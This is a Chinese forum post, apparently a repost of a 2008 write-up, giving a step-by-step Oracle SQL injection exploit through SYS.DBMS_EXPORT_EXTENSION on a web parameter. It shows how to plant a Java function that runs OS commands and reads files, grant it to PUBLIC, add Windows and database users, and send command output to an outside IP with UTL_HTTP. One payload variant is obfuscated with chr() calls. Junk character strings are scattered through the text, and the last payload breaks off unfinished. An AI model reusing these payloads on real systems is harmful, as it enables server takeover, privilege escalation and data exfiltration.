以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
) S& h, u, G& l5 M3 F6 m% D$ c2 C6 \1 o, ]5 v, E
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
4 T- j K3 ~) ]3 }$ ~! C8 V7 F的形式即可。(用" 'a'|| "是为了让语句返回true值) ' R4 v/ i, K' k6 Y* L+ C
语句有点长,可能要用post提交。 / }9 T3 N l; c7 k
以下是各个步骤:
7 M! U1 y3 J5 u* n: |( ^" G h1.创建包
5 }4 i7 C X2 L5 i/ y7 {通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
1 _1 u* ^3 k6 d5 O/xxx.jsp?id=1 and '1'<>'a'||( # A; T* W5 g! q) ~
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
! j, }2 H6 }1 e. ocreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(& ]9 K# C2 E8 G- s
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
4 m+ }" S* W# K0 M/ s}'''';END;'';END;--','SYS',0,'1',0) from dual 3 ]3 K) N& u5 N" Y9 i+ r; e
)
: `( {7 H( R# A------------------------
. L P; A' A7 [0 P. C( W如果url有长度限制,可以把readFile()函数块去掉,即: 9 M2 G8 x. Y* Q/ t
/xxx.jsp?id=1 and '1'<>'a'||(
% M2 f; J( \4 C! h/ @2 A! iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''7 g3 F. z& p; c3 V0 ]0 u; q5 c$ R/ K
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
& I. o' I! \' }, z u0 @9 Pnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
, y( [9 B+ K8 O; Y}'''';END;'';END;--','SYS',0,'1',0) from dual
# r# S( C8 o2 T1 _) - T, o2 i% Y3 C; x: K# V
同时把后面步骤 提到的 对readFile()的处理语句去掉。
6 h& e6 d. D2 ^' Z------------------------------ + }/ D C% `4 n6 D8 C
2.赋Java权限 & T g F+ h; _/ b8 d; _
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
+ b1 v* \( j& d+ l6 ^. z3.创建函数 + H. c: K) K0 A* v; G7 }
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
* s/ R3 Y+ d$ w4 x2 O# }! j. jcreate or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual5 m( f8 |/ T' o4 A" D1 b1 v& u
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''/ A7 _2 _- i% e/ F z! O
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual0 A2 n% Y2 S( ^& v+ J, b$ \1 J& O
4.赋public执行函数的权限
. K$ z/ j2 ^/ k# U+ V2 Iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual0 j3 p+ D# z$ G7 f, T
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
- I: i$ w( I# v0 R9 ~5.测试上面的几步是否成功
+ O3 V6 Y7 H& H0 Yand '1'<>'11'||( # ?0 H9 ^& h5 K5 D+ [+ U* v5 ~+ }
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
6 x- D) k; n( h/ u- i)
5 H2 r) w4 s6 vand '1'<>( , e' \; P* x2 n+ x# {2 [3 z$ G( k
select OBJECT_ID from all_objects where object_name ='LINXREADFILE' $ \: p1 i. p2 p" V! P
) 2 h# {1 O( R' z6 e4 d7 Y! D
6.执行命令:
9 J6 l6 c4 w, E( \ e/ e/xxx.jsp?id=1 and '1'<>( - q. N/ J) x3 a# M/ [" B4 U
select sys.LinxRunCMD('cmd /c net user linx /add') from dual ( ^" r6 n' x1 M
+ j% N- T" g Y& |, u
) 0 g0 Y9 M8 ?- U! J5 g1 _( y
/xxx.jsp?id=1 and '1'<>( ' P+ l" ]6 i$ a$ c( T7 S
select sys.LinxReadFile('c:/boot.ini') from dual
* c \9 ?' g( _; j4 B' i
* K$ Z1 ]; ~$ \8 {# ]6 f3 l) })
( T/ @7 b) ^; i% j2 n/ P) h " ~4 x0 @- x6 B! k4 q ^
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 % l/ M: U, }& p* V$ [- W
如果要查看运行结果可以用 union : ; \6 V3 F( d1 B. b: S/ s. L" f
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
0 _2 m, u' D! v: f7 v或者UTL_HTTP.request(: * f/ v' @7 E" V9 t
/xxx.jsp?id=1 and '1'<>(
0 S8 z5 n4 W2 c% R) f3 ASELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual$ @4 I2 y4 ?& O* N* V2 ]) U% }
) 9 t. R# B2 r# C' [1 |0 K6 s
/xxx.jsp?id=1 and '1'<>( " P- Y* U# ]2 N: Q+ q1 ]5 {" H" a
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual' E9 `' ^ c6 J! H" T
) : N2 f) |2 x3 v7 j8 F
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
- a2 v+ P y9 l" N! R& G-------------------- 1 u! w' e- U' H6 P/ ?' l! i
6.内部变化
9 \5 ^9 e: g7 E( e, d通过以下命令可以查看all_objects表达改变: . S2 L; u$ i/ t- N' a8 c' [0 ?/ e
select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'
0 n; B" z9 Q# L r7.删除我们创建的函数
" [- y+ x; X) g: Z! O4 }select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
3 ^/ I5 M/ D H+ H( tdrop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual ( ]- H' j2 ^- ] e- M* h- o( I
====================================================
! }" s, s/ c0 q; Q+ `4 ]全文结束。谨以此文赠与我的朋友。
/ |. \" w# B2 U6 `0 n/ l5 Olinx
) ^* E1 i7 `, a# |6 l124829445 ( R: K7 N' y, c; ?7 O: `
2008.1.12 1 x+ W* D$ a5 p& b6 d3 r
linyujian@bjfu.edu.cn : f/ A0 T5 U0 E' H
======================================================================
0 M6 X1 S& ~9 u, a- Q* J. Y, S% x测试漏洞的另一方法: ; l% }. p- i& r+ h# z, ^) t9 V
创建oracle帐号:
5 Y& g4 \ S: `' f m/ Rselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''1 a8 f/ L8 t9 r: C+ t
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual+ _/ Q& X" S, C
即: " R, i$ d/ U7 n: O4 \- q
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
2 ]2 m4 K4 ]7 z+ hchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual - g7 ` C/ S# H& ]: Q3 c
确定漏洞存在:
6 R# S- P+ T0 @; b$ k; V1<>( " i2 w/ I/ C6 ]1 M: ?
select user_id from all_users where username='LINXSQL'
$ L. Y8 ?4 g* y9 z. l)
; Y* q3 J- w- p4 n给linxsql连接权限: * p# N3 S; ~' N7 Z- k
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
4 \% L4 J6 j: r* h7 lGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual % K/ I" j5 a9 u3 G9 F! y
删除帐号: ; L, z6 V- w4 n4 T* ]
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
6 g1 A, j" U& _drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
; M% ]5 s$ O9 O' v, `====================== A/ E& D' V9 ]4 d7 w! P/ W
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
. T, A2 K! q5 X1.jsp?id=1 and '1'<>(
. ^. q, G2 N0 q; m9 o/ m* D. nselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ R* l& |* a* b0 w0 kcreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
6 Q4 c/ e7 @/ a& D2 j) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
/ F6 f) d* \7 h8 I5 }) k& M( h )
( N4 C T8 U" e! ?) Z/ c: E& Y) `$ y( w; C( ]
/ _/ N$ D9 B0 a1 L8 N& V
, f0 r$ `, A1 L2 W
|
发表于 2012-12-18 12:21:48
收藏
支持
反对